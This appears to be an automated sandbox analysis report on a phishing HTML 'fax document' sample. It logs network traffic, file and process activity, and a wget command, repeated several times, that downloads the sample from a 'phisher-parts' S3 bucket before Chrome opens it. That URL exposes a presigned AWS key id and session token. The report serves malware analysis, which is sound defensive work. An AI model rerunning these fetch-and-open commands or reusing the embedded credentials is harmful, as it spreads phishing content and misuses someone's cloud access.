Source: unknown	Network traffic detected: HTTP traffic on port 57044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57070
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57073
Source: unknown	Network traffic detected: HTTP traffic on port 57077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52987
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52982
Source: unknown	Network traffic detected: HTTP traffic on port 57066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52980
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52985
Source: unknown	Network traffic detected: HTTP traffic on port 52977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52984
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57089
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57084
Source: unknown	Network traffic detected: HTTP traffic on port 52988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57080
Source: unknown	Network traffic detected: HTTP traffic on port 57055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53000
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57057 -> 443

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.10.199:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.242.39.171:443 -> 192.168.2.6:57019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:57027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:57043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.6:57053 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:57063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:57081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:53007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:53011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:53014 version: TLS 1.2

Creates files inside the system directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\sets.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\LICENSE	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping764_1504294908\manifest.fingerprint	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\chrome_BITS_764_672093908

Jump to behavior

Very long command line found

Source: unknown	Process created: Commandline size = 2083
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2035
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2035	Jump to behavior

Source: classification engine

Classification label: mal48.phis.win@28/28@26/13

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\Desktop\cmdline.out

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4868:120:WilError_03

Source: C:\Windows\SysWOW64\wget.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3B%20filename%3D%22FaxDocument-873422-Wcepinc-Transmission.html%22%3B%20filename%2A%3DUTF-8%27%27FaxDocument-873422-Wcepinc-Transmission.html&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA37KREM2QLQCGJML5%2F20241024%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241024T201816Z&X-Amz-Expires=15711&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHMaCXVzLWVhc3QtMSJIMEYCIQD5%2BhZvZGN6J3Fxb1eh7JhGJFYatdM4YSe%2FB1Lhu54clwIhAMGxuFEnQyuPv%2FCfNJf%2FM%2Bjk%2FqrMeNeOhUAY3BKeKKVEKogECNz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMODIzMTkzMjY1ODI0IgxkadsnklCVctvwMWIq3APvQpQpI58knFBaUI%2FesQH1FJlTX%2BlsdPXwHmIEoA7JJLDUXnDzzteCVoUwvp1olI1h3PTJSpl3WxfIUi7BTzihzEqp3qn85AWXiDO1fWB1MbpD%2FSDfsrqMEgho9OQjpzPsQHM6e%2BmLmZ1yTIHD97Pf%2FN08letrYEZz2NFJVIQrLYTvWQwr2QPEZJyIm0WnuSbbq8Q1iYmha%2FIyVB9ZKxOPpvdgR1ptXZ6oLjzsy%2Bt%2BjafEISWZYsRDWwvLzIujqWG%2B63t%2BpCq3bxmYAsSHjxnzarIm7Hms4AOj9sIvR9pkL0wwD3qkWG7oBYHnb8k0%2B1AzzdJ2e%2FfLVD9TiwcG1KsTEzsabHJpEEBXTzducKIDP%2FcB%2FYcv03kyJnwWzUMaIbwdRV3lLj4itVuLpZpUbOm8RJChRMb83TR2qZdNKkjYktSR42en1uqps%2BU0qDC%2Fg93%2FFw2lIXwuMoTybf1fWYEY2OQz6E5eRoigwQhmg4wJe1ZZgjwP8fEQSG0yo9XZnXr%2FyAu%2BEt2RNzWy2wHuoZk3HVwPs4lWnhTyTcrSndmgKXkfVSpHeqCqkF3xveAbEhd%2F9qQutDIIcWnBBAlsILK5EUpHzYLvkIMYBMTieCtf00%2FFHqO4eOCLX5sGvDCHqeq4BjqkAeyFM5a%2FebzwF4uw87xMbquzIriBZ00BbMxSr1F6iNQrK5eiAmnkSYUYh%2Fp3YJofaU0ox8%2FOVLIHBKp3WtDzd5b5%2F5WwioyMhT1u0BDnhNT%2F%2B11YTTeSy4rC4fIYdhkm7tZrFS9Sa1WIiQXgQiBqqjkRydZT%2FLrmsyVTvK8wBscWkRvZxnU%2Bsi4OUJJHkmJ27ywwC3Ob5nE4D4%2FwrYfIb%2F4HWJO4&X-Amz-SignedHeaders=host&X-Amz-Signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3B%20filename%3D%22FaxDocument-873422-Wcepinc-Transmission.html%22%3B%20filename%2A%3DUTF-8%27%27FaxDocument-873422-Wcepinc-Transmission.html&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA37KREM2QLQCGJML5%2F20241024%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241024T201816Z&X-Amz-Expires=15711&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHMaCXVzLWVhc3QtMSJIMEYCIQD5%2BhZvZGN6J3Fxb1eh7JhGJFYatdM4YSe%2FB1Lhu54clwIhAMGxuFEnQyuPv%2FCfNJf%2FM%2Bjk%2FqrMeNeOhUAY3BKeKKVEKogECNz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMODIzMTkzMjY1ODI0IgxkadsnklCVctvwMWIq3APvQpQpI58knFBaUI%2FesQH1FJlTX%2BlsdPXwHmIEoA7JJLDUXnDzzteCVoUwvp1olI1h3PTJSpl3WxfIUi7BTzihzEqp3qn85AWXiDO1fWB1MbpD%2FSDfsrqMEgho9OQjpzPsQHM6e%2BmLmZ1yTIHD97Pf%2FN08letrYEZz2NFJVIQrLYTvWQwr2QPEZJyIm0WnuSbbq8Q1iYmha%2FIyVB9ZKxOPpvdgR1ptXZ6oLjzsy%2Bt%2BjafEISWZYsRDWwvLzIujqWG%2B63t%2BpCq3bxmYAsSHjxnzarIm7Hms4AOj9sIvR9pkL0wwD3qkWG7oBYHnb8k0%2B1AzzdJ2e%2FfLVD9TiwcG1KsTEzsabHJpEEBXTzducKIDP%2FcB%2FYcv03kyJnwWzUMaIbwdRV3lLj4itVuLpZpUbOm8RJChRMb83TR2qZdNKkjYktSR42en1uqps%2BU0qDC%2Fg93%2FFw2lIXwuMoTybf1fWYEY2OQz6E5eRoigwQhmg4wJe1ZZgjwP8fEQSG0yo9XZnXr%2FyAu%2BEt2RNzWy2wHuoZk3HVwPs4lWnhTyTcrSndmgKXkfVSpHeqCqkF3xveAbEhd%2F9qQutDIIcWnBBAlsILK5EUpHzYLvkIMYBMTieCtf00%2FFHqO4eOCLX5sGvDCHqeq4BjqkAeyFM5a%2FebzwF4uw87xMbquzIriBZ00BbMxSr1F6iNQrK5eiAmnkSYUYh%2Fp3YJofaU0ox8%2FOVLIHBKp3WtDzd5b5%2F5WwioyMhT1u0BDnhNT%2F%2B11YTTeSy4rC4fIYdhkm7tZrFS9Sa1WIiQXgQiBqqjkRydZT%2FLrmsyVTvK8wBscWkRvZxnU%2Bsi4OUJJHkmJ27ywwC3Ob5nE4D4%2FwrYfIb%2F4HWJO4&X-Amz-SignedHeaders=host&X-Amz-Signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0"
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\download\FaxDocument-873422-Wcepinc-Transmission.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1916,i,1730709302199590936,13554322330194458,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3B%20filename%3D%22FaxDocument-873422-Wcepinc-Transmission.html%22%3B%20filename%2A%3DUTF-8%27%27FaxDocument-873422-Wcepinc-Transmission.html&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA37KREM2QLQCGJML5%2F20241024%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241024T201816Z&X-Amz-Expires=15711&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHMaCXVzLWVhc3QtMSJIMEYCIQD5%2BhZvZGN6J3Fxb1eh7JhGJFYatdM4YSe%2FB1Lhu54clwIhAMGxuFEnQyuPv%2FCfNJf%2FM%2Bjk%2FqrMeNeOhUAY3BKeKKVEKogECNz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMODIzMTkzMjY1ODI0IgxkadsnklCVctvwMWIq3APvQpQpI58knFBaUI%2FesQH1FJlTX%2BlsdPXwHmIEoA7JJLDUXnDzzteCVoUwvp1olI1h3PTJSpl3WxfIUi7BTzihzEqp3qn85AWXiDO1fWB1MbpD%2FSDfsrqMEgho9OQjpzPsQHM6e%2BmLmZ1yTIHD97Pf%2FN08letrYEZz2NFJVIQrLYTvWQwr2QPEZJyIm0WnuSbbq8Q1iYmha%2FIyVB9ZKxOPpvdgR1ptXZ6oLjzsy%2Bt%2BjafEISWZYsRDWwvLzIujqWG%2B63t%2BpCq3bxmYAsSHjxnzarIm7Hms4AOj9sIvR9pkL0wwD3qkWG7oBYHnb8k0%2B1AzzdJ2e%2FfLVD9TiwcG1KsTEzsabHJpEEBXTzducKIDP%2FcB%2FYcv03kyJnwWzUMaIbwdRV3lLj4itVuLpZpUbOm8RJChRMb83TR2qZdNKkjYktSR42en1uqps%2BU0qDC%2Fg93%2FFw2lIXwuMoTybf1fWYEY2OQz6E5eRoigwQhmg4wJe1ZZgjwP8fEQSG0yo9XZnXr%2FyAu%2BEt2RNzWy2wHuoZk3HVwPs4lWnhTyTcrSndmgKXkfVSpHeqCqkF3xveAbEhd%2F9qQutDIIcWnBBAlsILK5EUpHzYLvkIMYBMTieCtf00%2FFHqO4eOCLX5sGvDCHqeq4BjqkAeyFM5a%2FebzwF4uw87xMbquzIriBZ00BbMxSr1F6iNQrK5eiAmnkSYUYh%2Fp3YJofaU0ox8%2FOVLIHBKp3WtDzd5b5%2F5WwioyMhT1u0BDnhNT%2F%2B11YTTeSy4rC4fIYdhkm7tZrFS9Sa1WIiQXgQiBqqjkRydZT%2FLrmsyVTvK8wBscWkRvZxnU%2Bsi4OUJJHkmJ27ywwC3Ob5nE4D4%2FwrYfIb%2F4HWJO4&X-Amz-SignedHeaders=host&X-Amz-Signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1916,i,1730709302199590936,13554322330194458,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe	Section loaded: explorerframe.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wget.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: wget.exe, 00000002.00000002.2182067093.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://phisher-parts-production-us-east-1.s3.amazonaws.com/68a29cbc-d8f9-4c01-aa8b-704c527e3dea/2024-10-24/hdp1f4m0mtn58r7e5djj3r2baep1oktpuitii5o1/d493f6c6bdfdcf5959ae27c95155d91b5b3c1ce0bab14ef02ea76d7c451b0ee9?response-content-disposition=attachment%3b%20filename%3d%22faxdocument-873422-wcepinc-transmission.html%22%3b%20filename%2a%3dutf-8%27%27faxdocument-873422-wcepinc-transmission.html&x-amz-algorithm=aws4-hmac-sha256&x-amz-credential=asia37krem2qlqcgjml5%2f20241024%2fus-east-1%2fs3%2faws4_request&x-amz-date=20241024t201816z&x-amz-expires=15711&x-amz-security-token=iqojb3jpz2lux2vjehmacxvzlwvhc3qtmsjimeyciqd5%2bhzvzgn6j3fxb1eh7jhgjfyatdm4yse%2fb1lhu54clwihamgxufenqyupv%2fcfnjf%2fm%2bjk%2fqrmeneohuay3bkekkvekogecnz%2f%2f%2f%2f%2f%2f%2f%2f%2f%2fweqabomodizmtkzmjy1odi0igxkadsnklcvctvwmwiq3apvqpqpi58knfbaui%2fesqh1fjltx%2blsdpxwhmieoa7jjlduxndzztecvouwvp1oli1h3ptjspl3wxfiui7btzihzeqp3qn85awxido1fwb1mbpd%2fsdfsrqmegho9oqjpzpsqhm6e%2bmlmz1ytihd97pf%2fn08letryezz2nfjviqrlytvwqwr2qpezjyim0wnusbbq8q1iymha%2fiyvb9zkxoppvdgr1ptxz6oljzsy%2bt%2bjafeiswzysrdwwvlziujqwg%2b63t%2bpcq3bxmyasshjxnzarim7hms4aoj9sivr9pkl0wwd3qkwg7obyhnb8k0%2b1azzdj2e%2fflvd9tiwcg1kstezsabhjpeebxtzduckidp%2fcb%2fycv03kyjnwwzumaibwdrv3llj4itvulpzpubom8rjchrmb83tr2qzdnkkjyktsr42en1uqps%2bu0qdc%2fg93%2ffw2lixwumotybf1fwyey2oqz6e5eroigwqhmg4wje1zzgjwp8feqsg0yo9xznxr%2fyau%2bet2rnzwy2whuozk3hvwps4lwnhtytcrsndmgkxkfvspheqcqkf3xveabehd%2f9qqutdiicwnbbalsilk5euphzylvkimybmtiectf00%2ffhqo4eoclx5sgvdchqeq4bjqkaeyfm5a%2febzwf4uw87xmbquziribz00bbmxsr1f6inqrk5eiamnksyuyh%2fp3yjofau0ox8%2fovlihbkp3wtdzd5b5%2f5wwioymht1u0bdnhnt%2f%2b11yttesy4rc4fiydhkm7tzrfs9sa1wiiqxgqibqqjkrydzt%2flrmsyvtvk8wbscwkrvzxnu%2bsi4oujjhkmj27ywwc3ob5ne4d4%2fwryfib%2f4hwjo4&x-amz-signedheaders=host&x-amz-signature=4bd824e8586cb631d993afbaa40b83fff9764a3fdcecf7e4b686cf1557dfa0d0" > cmdline.out 2>&1
